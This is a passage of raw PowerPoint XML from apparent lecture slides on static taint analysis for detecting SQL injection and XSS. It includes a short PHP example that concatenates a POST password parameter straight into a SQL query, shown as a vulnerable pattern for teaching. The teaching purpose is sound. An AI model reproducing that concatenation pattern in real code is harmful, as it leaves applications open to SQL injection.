                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>if values </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>derived </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-285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tainted  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-39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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>operations</a:t>
            </a:r>
            <a:endParaRPr sz="24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75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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Generating </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>statements (SQLI) with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-29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input</a:t>
            </a:r>
            <a:endParaRPr sz="20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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Generating response </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page contents</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-38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with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tainted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>input (XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="20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38604" y="616711"/>
            <a:ext cx="537083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Static </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>analysis: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>Tainted </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="175" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>flow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70102" y="1316987"/>
            <a:ext cx="6546215" cy="4928870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="48894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384"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Tainted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-254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analysis</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="242570" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10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data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>derived</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-9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external</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sources</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65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labeled</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-55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as  tainted</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="185"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-11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600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>parameters</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$pwd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> [‘password’]</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="282575" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="464"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-2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information</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-55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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>computed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-90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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>data  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10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900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>graph</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2550">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="5080" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-7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tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-75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variable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-7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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="0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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-9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computation,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-30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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-9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resultant  variable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>labeled </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-29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tainted</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="185"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$qry = </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“select </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>=‘” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$pwd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-220" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>+’”;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="15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tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-7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variable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-70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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-7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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="0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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-60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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95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sink,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10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warning</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-30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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>raised</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="209"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>invocation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-175" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>$conn‐&gt;query($qry);</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="567690" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84210"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10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variable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-30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then</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45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it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-35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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-7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as  tainted</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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996428" y="1441704"/>
            <a:ext cx="1343405" cy="274396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51</a:t>
            </a:fld>
            <a:endParaRPr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352291" y="603758"/>
            <a:ext cx="335407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Code</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> randomization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52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841502" y="1461008"/>
            <a:ext cx="7889240" cy="41986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10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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Monitor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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
